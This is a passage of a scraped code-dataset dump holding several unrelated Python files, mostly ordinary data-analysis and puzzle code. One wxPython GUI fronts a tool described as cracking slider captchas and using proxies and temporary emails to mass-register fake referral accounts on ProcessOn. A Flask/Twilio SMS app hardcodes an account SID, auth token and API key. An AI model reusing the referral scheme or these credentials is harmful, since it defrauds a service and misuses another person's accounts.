i_node = get_from_node_dict(i.text)\n for jdx, j in enumerate(sentences[idx+1:]):\n j_node = get_from_node_dict(j.text)\n score = abs(i.similarity(j))\n i_node.to(j_node, score)\n return list(node_dict.values())\n \n def _generate_nodes_from_cooccurence(self, tokens: List[str],\n cooccurence_value=2) -> List[Undirected_Node]:\n \"\"\"given a string, use coccurence to create an undirected graph where nodes are connected if they are coocurrent\"\"\"\n node_dict = {}\n \n # helper function to get a Node from the dict or generate a new Node if one doesn't exist\n def get_from_node_dict(token_orth:str):\n if token_orth in node_dict: return node_dict[token_orth]\n else:\n node_dict[token_orth] = Undirected_Node(name=token_orth)\n return node_dict[token_orth]\n \n \n for index,token in enumerate(tokens):\n node = get_from_node_dict(token)\n previous, next = self._find_cooccurent(tokens, index, cooccurence_value=cooccurence_value)\n # log.error(previous)\n # log.error(next)\n \n nodes = [get_from_node_dict(token) for token in (*previous, *next)]\n # log.error(nodes)\n # log.error('\\n')\n \n for other_node in nodes:\n node.to(other_node)\n \n return list(node_dict.values())\n \n def regenerate_keyphrases(self, keyword_dict:Dict[str, int], original_text:str):\n \"\"\"combine keywords that are next to each other\"\"\"\n keywords = set(i.lower() for i in keyword_dict)\n log.debug(keyword_dict)\n keyword_dict_copy = {k.lower():v for k,v in keyword_dict.items()}\n \n original_text = original_text.lower()\n split_text = original_text.replace('\\n',', ').split(' ')\n \n results:Dict[str, int] = {}\n keywords_used = set()\n \n # find keyphrases in the text by checking for contiguous keywords\n index = 0\n while index < len(split_text):\n token = split_text[index]\n \n if token not in keywords: \n # the current word is not part of a keyphrase\n index+=1\n continue \n \n keywords_used.add(token)\n max_score = keyword_dict_copy[token]\n keyphrase = [token]\n increment = 1\n \n while True:\n next_token = split_text[index+increment] if index+increment <= len(split_text)-1 else ''\n cleaned_next_token = re.sub(r'[^a-zA-Z0-9]', '', next_token)\n \n if not cleaned_next_token or cleaned_next_token not in keywords: # terminating condition - add phrase to results\n log.debug(f'adding keyphrase {keyphrase} because not in keywords')\n results[' '.join(keyphrase)] = max_score\n break\n \n score = keyword_dict_copy.get(cleaned_next_token) or keyword_dict_copy.get(next_token) or -1\n max_score = max(score, max_score)\n \n keywords_used.add(cleaned_next_token)\n keyphrase.append(cleaned_next_token)\n \n if (any(i in next_token for i in [',', '.', '\\n'])): # if the word has either comma or fullstop, then end the keyphrase\n log.debug(f'adding keyphrase {keyphrase} because terminator')\n results[' '.join(keyphrase)] = max_score\n break\n \n increment += 1\n \n index+=increment\n \n results = {k:v for k,v in results.items() if len(k.split(' ')) > 1}\n \n return results\n \n \n \n \n # if any(token in l for l in keywords) and index'\n\n ask = str()\n while ask.lower() not in valid_optns.keys():\n ask = input(qstn_txt)\n if ask.lower() not in valid_optns.keys():\n print('\"' + ask + '\" is not a valid input.')\n else:\n print('Selected: ' + valid_optns.get(ask))\n return valid_optns.get(ask)\n\ndef time_string(sec):\n # Returns a detailed, human readable time string based on a numeric value representing number of seconds\n # Args:\n # (sec) - a numeric value representing a number of seconds\n factrs = {'years': 365*24*60*60, 'days': 24*60*60,'hrs': 60*60, 'mins': 60}\n x = round(sec,0)\n strt = False\n out = {}\n for i in factrs:\n y, x = divmod(x, factrs.get(i))\n if (y == 0 and strt == True) or y!=0:\n out[i] = int(y)\n strt = True\n out['secs'] = int(x)\n str = ', '.join('{} {}'.format(val, key) for key, val in out.items())\n return str\n\ndef series_mode_summary(series, txt):\n # Prints text summarising the mode of the values from a provided series accompanied with descriptive text\n # Args:\n # (series) - A pandas series\n # (txt) - Descriptive text of the mode being printed\n conv = lambda x: int(round(x,0)) if type(x) == float else x\n modes = [str(conv(i)) for i in series.mode(dropna=True)]\n mode_str = ' (AND) '.join(modes)\n multi = '' if len(modes) == 1 else '*'+str(len(modes))\n mode_vals = series.value_counts().sort_values(ascending=False)\n print('{}{}, n={:,}{}'.format(txt, mode_str,mode_vals.iloc[0],multi))\n\ndef main_input():\n # Function that asks the user for input regarding data to select and filter returns the user selections\n redo = 'Yes'\n while redo == 'Yes':\n # USER INPUT: Ask user to select city dataset to analyse\n city = list_select('\\nWhich dataset would you like to select?',\n ['washington','chicago','new_york_city'])\n\n # USER INPUT: Ask user if they want to filter data by month\n if list_select('\\nWould you like to filter by month?', ['Yes','No']) == 'Yes':\n month = list_select('\\nWhich month?',\n [cal.month_name[i] for i in np.arange(1,7)])\n else:\n month = False\n\n # USER INPUT: Ask user if they want to filter data by type of day\n if list_select('\\nWould you like to filter the data by type of day?', ['Yes','No'])=='Yes':\n daytype = list_select('\\nWhich day type?', ['weekend','weekday'])\n else:\n daytype = False\n\n # Check with user if they are happy with their selection\n print(\n '\\nYou selected:\\n Dataset: ' + city +\n '\\n Month filter: ' + str(month) +\n '\\n Day type filter: ' + str(daytype)\n )\n redo = list_select(\"Would you like to re-do your selection?\", ['Yes','No'])\n\n return city, month, daytype\n\n\ndef main_datamanip(city, month, daytype):\n # Reads a csv into a dataframe then manipulated the dataframe\n # Args:\n # (city) - the name of the csv file to read into the DATAFRAME\n # (month) - a string representing the month value to filter by,\n # has a value of False if no filtering is to be done.\n # (daytype) - a string representing the daytype fo filter by,\n # has a value of False if no filtering is to be done.\n # Returns:\n # The dataframe created by the function.\n\n # Read csv into dataframe\n print(\"\\nReading csv into dataframe...\")\n global df\n df = pd.read_csv('{}.csv'.format(city))\n\n # REDUNDANT\n print(\"Creating new column 'ROUTE'...\")\n x = df[['Start Station','End Station']].to_numpy()\n x.sort(axis=1)\n df['ROUTE'] = [\"<==>\".join(i) for i in x.tolist()]\n\n # REDUNDANT\n print(\"Creating new column 'DIRECTION'...\")\n dir_cats = {\n 'LOOP': (df['Start Station'] == df['End Station']),\n 'TO<==>FROM': (df['Start Station'] > df['End Station']),\n 'FROM<==>TO': (df['Start Station'] < df['End Station'])\n }\n df['DIRECTION'] = np.select(dir_cats.values(), dir_cats.keys())\n\n # Create Start Month Column. Filter if necessary\n print(\"Creating new column 'Start Month'...\")\n df['Start Month'] = pd.to_datetime(df['Start Time']).dt.month_name()\n df['Start Month'] = pd.Categorical(df['Start Month'],\n categories = list(cal.month_name[1:]),\n ordered = True)\n if month:\n print(\"Filtering by 'Start Month' == '\" + month + \"'...\")\n df = df[(df['Start Month']==month)]\n\n # Create Start Day columns\n print(\"Creating new column 'Start Day Number'...\")\n df['Start Day Number'] = pd.to_datetime(df['Start Time']).dt.dayofweek\n print(\"Creating new column 'Start Day'...\")\n df['Start Day'] = pd.to_datetime(df['Start Time']).dt.day_name()\n df['Start Day'] = pd.Categorical(df['Start Day'],\n categories = list(cal.day_name),\n ordered = True)\n\n # Create Start Hour columns\n print(\"Creating new column 'Start Hour'...\")\n df['Start Hour'] = pd.to_datetime(df['Start Time']).dt.strftime('%H')\n df['Start Hour (12H)'] = pd.to_datetime(df['Start Time']).dt.strftime('%I%p')\n\n # Fillna the 'Gender' column if present\n if 'Gender' in df.columns:\n df['Gender'].fillna('Unknown', inplace=True)\n\n print(\"Creating new column 'Trip Duration (minutes)'...\")\n df['Trip Dur(mins)'] = df['Trip Duration']/60\n\n # Create 'Start Day Type' column, filter if necessary\n print(\"Creating new column 'Start Day Type'...\")\n day_cats = {\n 'weekend': (df['Start Day Number'] > 4),\n 'weekday': (df['Start Day Number'] <= 4)\n }\n df['Start Day Type'] = np.select(day_cats.values(), day_cats.keys())\n if daytype:\n print(\"Filtering by 'Start Day Type' == '\" + daytype + \"'...\")\n df = df[(df['Start Day Type']==daytype)]\n\n # Create generation column\n if 'Birth Year' in df.columns:\n print(\"Creating new column 'Generation'...\")\n gnrtn_cats = {\n \"Unknown\": (np.isnan(df['Birth Year'])),\n \"Pre-boomer(-'45)\": (df['Birth Year'] < 1946),\n \"Boomer('46-'64)\": (df['Birth Year'].between(1946 ,1965, 'left')),\n \"Gen-X('65-'80)\": (df['Birth Year'].between(1965, 1981, 'left')),\n \"Gen-Y('80-'96)\": (df['Birth Year'].between(1981, 1997, 'left')),\n \"Gen-Z('97-)\": (df['Birth Year'] >= 1997)\n }\n df['Generation'] = np.select(gnrtn_cats.values(), gnrtn_cats.keys())\n df['Generation'] = pd.Categorical(df['Generation'],\n categories = gnrtn_cats.keys(),\n ordered = True)\n\n # Create 'Duration Catoegory' column\n print(\"Creating new column 'Duration Category'...\")\n dur_cats = {\n '00<=mins<05': (df['Trip Dur(mins)'] < 5),\n '05<=mins<10': (df['Trip Dur(mins)'].between(5, 10, 'left')),\n '10== 30)\n }\n df['Duration Category'] = np.select(dur_cats.values(), dur_cats.keys())\n\n return df\n\n\ndef main_stats(df, month, daytype):\n # Calculates and prints descriptive statistics from the dataframe provided\n # Args:\n # (df) - the dataframe to be analysed\n # (month) - a string indicating whether monthly stats can be calculated\n # (daytype) - a string indicating whether daytype stats can be calculated\n # Returns:\n # Nothing\n\n # 1 Popular times of Travel\n print('\\nTOPIC 1: POPULAR TIMES OF TRAVEL\\n')\n\n # -most common month\n if month == False:\n series_mode_summary(df['Start Month'],'Most popular month:\\n ')\n\n # -most common day of week\n day_counts = df['Start Day'].value_counts().sort_values(ascending = False)\n if daytype == False:\n txt = ''\n elif daytype == 'weekend':\n txt = 'weekend '\n elif daytype == 'weekday':\n txt = 'week'\n series_mode_summary(df['Start Day'],\n 'Most popular {}day:\\n '.format(txt))\n\n # -most common hour of day\n series_mode_summary(df['Start Hour (12H)'],\n 'Most popular starting hour:\\n ')\n\n # 2 Popular stations and trip\n print('\\nTOPIC 2: POPULAR STATIONS AND ROUTES\\n')\n # -most common start station\n series_mode_summary(df['Start Station'],\n 'Most popular starting station:\\n ')\n # -most common end station\n series_mode_summary(df['End Station'],\n 'Most popular ending station:\\n ')\n # -most common trip from start to end\n route_counts = df[['Start Station','End Station']].value_counts()\n max = route_counts.max()\n modes = route_counts[route_counts == max]\n print('Most popular route:')\n routes =list()\n for i, j in modes.index:\n routes.append(' {} {}, n={:,}'.format(i,j,max))\n print('\\n &\\n'.join(routes))\n\n # 3 Trip Duration\n print('\\nTOPIC 3: TRIP DURATIONS\\n')\n # -total travel time\n tot_time = time_string(df['Trip Duration'].sum())\n print('Total user time spent in transit:\\n ' + tot_time)\n # -average travel time\n ave_time = time_string(df['Trip Duration'].mean())\n print('Average trip duration:\\n ' + ave_time)\n\n # 4 User info\n print('\\nTOPIC 4: USER INFO')\n # -counts of each user type\n print('\\nTrip counts by user type:')\n n_utype = df['User Type'].value_counts().sort_values(ascending = False)\n for i in n_utype.index:\n print(' {}: {:,}'.format(i.upper(), n_utype.loc[i]))\n\n\n # user stats for Chicago and New York datasets\n if city in ['chicago', 'new_york']:\n # -count of each gender (dataset specific)\n print('\\nTrip counts by user gender:')\n n_gender = df['Gender'].value_counts()\n for i in n_gender.index:\n print(' {}: {:,}'.format(i.upper(), n_gender.loc[i]))\n\n # -earliest, most recent, most common year of birth\n print('\\nYear of birth stats:')\n print(' EARLIEST: {:.0f}'.format(df['Birth Year'].dropna().min()))\n print(' LATEST: {:.0f}'.format(df['Birth Year'].dropna().max()))\n series_mode_summary(df['Birth Year'], ' MOST COMMON: ')\n\ndef bar_chart(df):\n # Displays stacked bar charts based on requested user input\n # Args:\n # (df) - the dataframe used to prepare the bar chars from\n # Returns:\n # Nothing\n\n # Set list of columns user can select for visualisation\n category_list = ['Gender', 'User Type', 'Generation', 'Duration Category',\n 'Start Hour','Start Month','Start Day Type', 'Start Day']\n category_list = [i for i in category_list if i in df.columns]\n\n # Select x-axis category\n xaxis = list_select('\\nSelect a category to represent along the x-axis.',\n category_list)\n category_list.remove(xaxis)\n\n # Select bar grouping category\n groups = list_select('\\nSelect a category to group the bars by.',\n category_list)\n\n # Prepare dataframe for chart\n df2 = df.groupby([groups, xaxis])\n df2 = df2.agg(transit_time=('Trip Duration',np.sum),\n trips=('Trip Duration', 'size'))\n df2 = df2.reset_index()\n df3 = df2.pivot(index=xaxis, columns=groups, values='trips')\n df3.sort_index(axis=1, inplace=True)\n\n # create and format plot\n plt.ion()\n ax = df3.plot.bar(stacked=True, backend='matplotlib')\n plt.xticks(rotation=45)\n ax.set_yticks(ax.get_yticks())\n ax.set_yticklabels(['{:,}'.format(int(x)) for x in ax.get_yticks().tolist()])\n plt.title('Number of Trips by {}, grouped by {}'.format(xaxis, groups))\n plt.ylabel('Number of Trips')\n plt.tight_layout()\n\n\n# EXECUTE MAIN FUNCTIONS\n\n# Ask for input and prepare data\ncity, month, daytype = main_input()\ndf = main_datamanip(city, month, daytype)\n\n# Print raw data\nif list_select('\\nWould you like to see 5 lines of the dataset you selected?', ['Yes','No']) == 'Yes':\n again = 'Yes'\n x = 0\n while again == 'Yes':\n tabulate(df.iloc[x:x+5], headers = 'keys')\n again = list_select('\\nPrint another 5 lines?', ['Yes','No'])\n x += 5\n\n# Print descriptive statistics\nmain_stats(df, month, daytype)\n\n# Display any visualisations\nif list_select('\\nWould you like to create a bar chart of the trip data?', ['Yes','No']) == 'Yes':\n again = None\n while again != 'No':\n bar_chart(df)\n again = list_select('\\nWould you like to create another bar chart?', ['Yes','No'])\n","repo_name":"MisterRousseau/GIT-PROJ-3","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":13829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12188161966","text":"# encoding: utf-8\n\nimport os\nimport csv\nimport json\nimport geojson\nfrom shapely.geometry import shape\n\ndef write_errors_to_file(env_name, coverage, test_category, detail_test_result):\n \"\"\" crée le fichier csv de sortie contenant les erreurs des tests exécutés \"\"\"\n file_name = \"{}_{}_{}.csv\".format(env_name, coverage, test_category )\n out_file = os.path.realpath(\"../frontend/results/\" + file_name)\n with open(out_file, \"w\") as csv_file:\n writer = csv.writer(csv_file, delimiter=';', quoting=csv.QUOTE_MINIMAL)\n for line in detail_test_result:\n writer.writerow(line)\n\ndef generate_file_summary():\n \"\"\" crée le fichier file.json de sortie listant les fichiers à afficher sur le frontend \"\"\"\n file_dir = os.path.realpath(\"../frontend/results/\")\n file_list = {\"files\":[]}\n for f in os.listdir(file_dir):\n full_f = os.path.join(file_dir, f)\n if os.path.isfile(full_f) and (f[-3:]==\"csv\"):\n file_list[\"files\"].append(f)\n with open(os.path.join(file_dir, \"files.json\"), mode=\"w\", encoding=\"utf8\") as f:\n json.dump(file_list, f, indent=4, separators=(',', ': '))\n f.close()\n\ndef geojson_to_wkt(geojson_data):\n if geojson_data['coordinates'] == []:\n return \"\"\n g = geojson.loads(json.dumps(geojson_data))\n wkt = shape(g).wkt\n return wkt.replace(\", \", \",\")\n\nif __name__ == \"__main__\":\n generate_file_summary()\n","repo_name":"kinnou02/vipere","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37126971732","text":"import re\n\ndef checkio(words_set):\n\n words = list(words_set)\n words.sort(key=len)\n\n #print(words)\n\n for suffix_idx in range( len(words)-1):\n suffix = words[suffix_idx]\n\n #print(suffix_idx)\n for word_idx in range(suffix_idx+1, len(words)):\n word = words[word_idx]\n #print('word_idx:',word_idx)\n if suffix != word:\n #print('suffix:',suffix,' word:', word)\n if word.endswith(suffix):\n return True\n\n return False\n\n\n#These \"asserts\" using only for self-checking and not necessary for auto-testing\nif __name__ == '__main__':\n print(checkio({\"hello\", \"lo\", \"he\"}))\n\n print(checkio({\"helicopter\", \"li\", \"he\"}))\n\n\n\n assert checkio({\"hello\", \"lo\", \"he\"}) == True, \"helLO\"\n assert checkio({\"hello\", \"la\", \"hellow\", \"cow\"}) == False, \"hellow la cow\"\n assert checkio({\"walk\", \"duckwalk\"}) == True, \"duck to walk\"\n assert checkio({\"one\"}) == False, \"Only One\"\n assert checkio({\"helicopter\", \"li\", \"he\"}) == False, \"Only end\"\n","repo_name":"sandeepmanocha/myCheckIO","sub_path":"suffix.py","file_name":"suffix.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"9092189775","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport threading\n\nimport wx\nimport wx.adv\nfrom pubsub import pub\n\nfrom handler import main_process\nfrom logger import LOG\nfrom tools import *\n\n# 根据当前文件获取当前路径\n# CURRENT_PATH = os.path.abspath(os.path.dirname(__file__))\n\n\nclass WorkerThread(threading.Thread):\n def __init__(self, url: str, numbers: int, visual: bool, logger=None):\n super().__init__()\n self.url = url\n self.numbers = numbers\n self.visual = visual\n self.logger = logger\n self.start()\n\n def run(self):\n pub.sendMessage('update', msg='start')\n main_process(url=self.url, numbers=self.numbers, visual=self.visual, logger=self.logger)\n pub.sendMessage('update', msg='finish')\n\n def stop(self):\n try:\n async_raise(self.ident, SystemExit)\n except (ValueError, SystemError):\n self.logger.exception(\"停止线程时遇到异常: \")\n pass\n\n\nclass ProcessOnFrame(wx.Frame):\n def __init__(self, *args, **kw):\n super(ProcessOnFrame, self).__init__(*args, **kw)\n # 绑定关闭事件\n self.Bind(wx.EVT_CLOSE, self.onClose)\n self.icon = get_resource_file(relative_path='favicon.ico', reference=__file__)\n self.logger = None\n self.worker = None\n self.tc_link, self.ch_number, self.tc_log, self.ck_visualization, self.btn_signup = None, None, None, None, None\n self.initUI()\n self.Center()\n self.Show()\n\n def onClose(self, event):\n if self.worker and self.worker.is_alive():\n ret = wx.MessageBox(u'程序正在运行中,是否关闭程序?', u'确认退出', wx.OK | wx.CANCEL)\n if ret == wx.OK:\n if self.worker.is_alive():\n self.worker.stop()\n event.Skip()\n else:\n ret = wx.MessageBox(u'是否关闭程序?', u'确认退出', wx.OK | wx.CANCEL)\n if ret == wx.OK:\n event.Skip()\n\n def initUI(self):\n # 设置窗口图标\n self.SetIcon(wx.Icon(self.icon, wx.BITMAP_TYPE_ICO))\n\n self.initMenu()\n\n panel = wx.Panel(self)\n\n # 邀请链接/邀请用户数标签\n st_link = wx.StaticText(panel, label=u'邀请链接: ', style=wx.TE_LEFT)\n st_desc_link = wx.StaticText(panel, label=u'注:在账户中心最下方可以找到邀请链接,'\n u'如:https://www.processon.com/i/5cc564f5e4b09eb4ac2b498e',\n style=wx.TE_LEFT | wx.ST_ELLIPSIZE_END)\n st_number = wx.StaticText(panel, label=u'邀请用户数: ', style=wx.TE_LEFT)\n st_desc_number = wx.StaticText(panel, label=u'注:每个用户通过邀请链接注册成功后,你会获得3张文件数量的奖励')\n # 邀请链接输入框\n self.tc_link = wx.TextCtrl(panel, style=wx.TE_LEFT)\n # 邀请用户数选择器\n choices = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']\n self.ch_number = wx.Choice(panel, choices=choices)\n self.ch_number.SetSelection(0)\n # self.Bind(wx.EVT_CHOICE, self.onChoice, self.ch_number)\n # 日志\n self.tc_log = wx.TextCtrl(panel, style=wx.TE_MULTILINE | wx.TE_READONLY | wx.HSCROLL)\n # 可视化勾选框\n self.ck_visualization = wx.CheckBox(panel, label=u'可视化', style=wx.CHK_2STATE)\n # 邀请注册按钮\n self.btn_signup = wx.Button(panel, label=u'邀请注册')\n self.Bind(wx.EVT_BUTTON, self.onSignUpClick, self.btn_signup)\n\n # 邀请链接组件布局\n bs_link = wx.BoxSizer(wx.HORIZONTAL)\n bs_link.Add(st_link, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_LEFT, border=5)\n bs_link.Add(self.tc_link, proportion=2, flag=wx.ALL | wx.EXPAND, border=5)\n\n bs_desc_link = wx.BoxSizer(wx.HORIZONTAL)\n bs_desc_link.Add(st_desc_link, proportion=0, flag=wx.LEFT | wx.RIGHT | wx.ALIGN_LEFT, border=5)\n\n # 邀请用户数组件布局\n bs_number = wx.BoxSizer(wx.HORIZONTAL)\n bs_number.Add(st_number, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL | wx.ALIGN_LEFT, border=5)\n bs_number.Add(self.ch_number, proportion=0, flag=wx.ALL, border=5)\n bs_number.Add(st_desc_number, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL, border=5)\n\n # 日志组件布局\n bs_log = wx.BoxSizer(wx.HORIZONTAL)\n bs_log.Add(self.tc_log, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)\n\n # 邀请注册按钮组件布局\n bs_signup = wx.BoxSizer(wx.HORIZONTAL)\n bs_signup.AddStretchSpacer(1)\n bs_signup.Add(self.ck_visualization, proportion=0, flag=wx.ALL | wx.ALIGN_CENTER_VERTICAL, border=5)\n bs_signup.Add(self.btn_signup, proportion=0, flag=wx.ALL, border=5)\n\n bs_all = wx.BoxSizer(wx.VERTICAL)\n bs_all.Add(bs_link, proportion=0, flag=wx.TOP | wx.LEFT | wx.RIGHT | wx.EXPAND, border=5)\n bs_all.Add(bs_desc_link, proportion=0, flag=wx.LEFT | wx.RIGHT | wx.BOTTOM | wx.EXPAND, border=5)\n bs_all.Add(bs_number, proportion=0, flag=wx.ALL | wx.EXPAND, border=5)\n bs_all.Add(bs_log, proportion=1, flag=wx.ALL | wx.EXPAND, border=5)\n bs_all.Add(bs_signup, proportion=0, flag=wx.ALL | wx.EXPAND, border=5)\n panel.SetSizer(bs_all)\n self.logger = LOG(name=__name__, topic='log').getLogger()\n # 订阅消息队列\n pub.subscribe(self.updateButtonStatus, 'update')\n pub.subscribe(self.updateLogMessage, 'log')\n\n def initMenu(self):\n # 菜单栏\n menubar = wx.MenuBar()\n # '帮助'菜单\n help_menu = wx.Menu()\n # '关于'菜单项\n about_item = wx.MenuItem(help_menu, wx.ID_ABOUT, '&关于\\tCtrl+A')\n self.Bind(wx.EVT_MENU, self.onAbout, about_item)\n\n # '退出'菜单项\n quit_item = wx.MenuItem(help_menu, wx.ID_EXIT, '&退出\\tCtrl+Q')\n self.Bind(wx.EVT_MENU, self.onQuit, quit_item)\n\n help_menu.Append(about_item)\n help_menu.Append(quit_item)\n menubar.Append(help_menu, '&帮助')\n menubar.SetBackgroundColour('Black')\n\n self.SetMenuBar(menubar)\n\n def onAbout(self, event):\n description = \"\"\"\n 1. 通过代理网站获取可用代理\n 2. 通过OpenCV以及滑动算法破解滑动验证码\n 3. 通过临时邮箱进行注册以及收取邮件验证码\n \"\"\"\n info = wx.adv.AboutDialogInfo()\n info.SetIcon(wx.Icon(self.icon, wx.BITMAP_TYPE_ICO))\n info.SetName('ProcessOn SignUp')\n info.SetVersion('1.0.0')\n info.SetDescription(description)\n info.SetWebSite(r'https://www.processon.com')\n info.AddDeveloper('Killua')\n wx.adv.AboutBox(info)\n\n def onQuit(self, event):\n self.Close()\n\n def onSignUpClick(self, event):\n self.worker = WorkerThread(url=self.tc_link.GetValue(), numbers=int(self.ch_number.GetStringSelection()),\n visual=self.ck_visualization.GetValue(), logger=self.logger)\n event.GetEventObject().Disable()\n self.ck_visualization.Disable()\n\n def updateButtonStatus(self, msg):\n if msg == 'start':\n self.tc_log.AppendText(u'========== 邀请注册开始 ==========\\n')\n elif msg == 'finish':\n self.tc_log.AppendText(u'========== 邀请注册完成 ==========\\n\\n')\n self.worker = None\n self.ck_visualization.Enable()\n self.btn_signup.Enable()\n\n def updateLogMessage(self, msg):\n self.tc_log.AppendText(msg)\n\n\nif __name__ == '__main__':\n app = wx.App()\n ProcessOnFrame(None, title='ProcessOn邀请用户注册, 增加个人文件数', size=(600, 400))\n app.MainLoop()\n sys.exit(0)\n","repo_name":"vankillua/processon-signup","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"72424385993","text":"with open('input_dec_7.txt') as file:\n f = [line.strip('\\n') for line in file.readlines()]\n\nclass Directory:\n def __init__(self, name, parent):\n self.name = name\n self.parent = parent\n self.content = list()\n\n def is_empty(self):\n return len(self.content) == 0\n\n def get_size(self):\n return sum(list(map(lambda x: x.get_size(), self.content)))\n \n\nclass File:\n def __init__(self, size, name):\n self.size = int(size)\n self.name = name\n\n def get_size(self):\n return self.size\n\n\ncur_dir = Directory('/', None)\ndirectories = [cur_dir]\n\ndef find_dir(name):\n for item in cur_dir.content:\n if item.name == name:\n return item\n\n\nfor i, line in enumerate(f):\n commands = line.split()\n if commands[0] == '$' and commands[1] == 'cd':\n if commands[2] == '..':\n cur_dir = cur_dir.parent\n elif i > 0:\n cur_dir = find_dir(commands[2])\n \n elif commands[0] == '$':\n continue\n\n elif commands[0] == 'dir':\n dir = Directory(commands[1], cur_dir)\n cur_dir.content.append(dir)\n directories.append(dir)\n\n else:\n cur_dir.content.append(File(commands[0], commands[1]))\n\ndirectories.sort(key=lambda x: x.get_size())\navailable_space = 70_000_000 - directories[-1].get_size()\nneeded_space = 30_000_000 - available_space\n\ntotal_size = 0\nsize_smallest_dir = 0\nfor dir in directories:\n size = dir.get_size()\n if size <= 100_000:\n total_size += size\n if size >= needed_space:\n size_smallest_dir = size\n break\n\nprint(f'Answer part 1: {total_size}')\nprint(f'Answer part 2: {size_smallest_dir}')\n","repo_name":"Teun2305/Advent-of-code-2022","sub_path":"dec_7/code_dec_7.py","file_name":"code_dec_7.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12917162726","text":"# -*- coding: utf-8 -*-\nfrom collections import namedtuple\n\n_checked = namedtuple('YoutubePack', ['result', 'origin_data', 'title', 'link', 'v'])\n\nclass YoutubePack(_checked):\n def __new__(cls, result=False, origin_data='', title='', link='', v=''):\n return super(YoutubePack, cls).__new__(cls, result, origin_data, title, link, v)\n\n def as_dict(self):\n d = {\n 'result': self.result,\n 'origin_data': self.origin_data,\n 'title': self.title,\n 'link': self.link,\n 'v': self.v,\n # https://i.ytimg.com/vi_webp/[v]/hqdefault.webp\n 'thumbnail': \"https://i.ytimg.com/vi_webp/\" + self.v + \"/hqdefault.webp\",\n }\n return d","repo_name":"se0kjun/YoutubePlayListDownloader","sub_path":"youtube_playlist_downloader/youtube_pack.py","file_name":"youtube_pack.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"35126752400","text":"# coding=utf-8\nimport json\n# 4条需要填充.. 手动填?\n# 35 各漏一条,手动处理... , {\"t\": \"16:30\", \"d\": [16342, 2622, 1904, 1044]}\n# 62\neid = \"68\"\nwith open(\"modif_data/\"+eid+\".json\") as f:\n\tdata = json.load(f)\n\nresult = {\"id\": eid, 'borders': [\n 100,\n 2500,\n 5000,\n 10000\n]}\nresult[\"log\"] = []\nfor i in data[\"data\"][\"logs\"]:\n\ttmp = {}\n\td = [i[\"borders\"][\"100\"],\n\t\ti[\"borders\"][\"2500\"],\n\t\ti[\"borders\"][\"5000\"],\n\t\ti[\"borders\"][\"10000\"]]\n\t\n\ttmp[\"d\"] = d\n\ttmp[\"t\"] = i['datetime'][11:16]\n\tresult[\"log\"].append(tmp)\n\nwith open('new_data/'+eid+'_modif.json', 'w') as f:\n\tjson.dump(result, f)","repo_name":"Tmn07/MLTD-rankingview","sub_path":"utils/data_clean2.py","file_name":"data_clean2.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"23824687710","text":"from app.home import blueprint\nfrom flask import render_template,request,escape\nfrom flask_login import login_required\nfrom app.base.models import User,SentM,ReceiveM\nfrom app import db\n\nfrom twilio.rest import Client\nfrom twilio.twiml.messaging_response import Message, MessagingResponse\nimport requests\n\n# put your own credentials here\naccount_sid = \"ACffe02b6e6f367781b36d4251bc962952\"\nauth_token = \"dfa6787ca8be1a3884f7736ff5557d03\"\n\nsubscription_key = \"56bdc3a1166c49c89304c1c9e2f8cfae\"\nassert subscription_key\n\n\n@blueprint.route('/index',methods=['GET', 'POST'])\n@login_required\ndef index():\n first_message = \"Hi , I saw that your was delivered. How are you enjoying it so far?\"\n positive = \"Great, can you describe what you love most about ? \"\n negative = \"I'm sorry to hear that, what do you dislike about ?\"\n if request.method == 'POST':\n #Get everything from the form\n number = request.form['number']\n prodType = request.form['prodType'] \n name = request.form['fullname']\n firstname = name.split()\n firstname = firstname[0]\n first_message = first_message.replace(\"\",firstname)\n first_message = first_message.replace(\"\",prodType)\n positive = positive.replace(\"\",prodType)\n negative = negative.replace(\"\",prodType)\n \n #Twilio message send\n client = Client(account_sid, auth_token)\n client.messages.create(\n to=number,\n from_=\"+13092710302\",\n body=first_message)\n \n #DB storage\n sentM = SentM(phoneNum=number,name=name,text=first_message,prodtype=prodType)\n db.session.add(sentM)\n db.session.commit()\n \n \n render_template('index.html',first_message=escape(first_message),positive=escape(positive),negative=escape(negative)) \n return render_template('index.html',first_message=first_message,positive=positive,negative=negative) \n\n\n@blueprint.route('/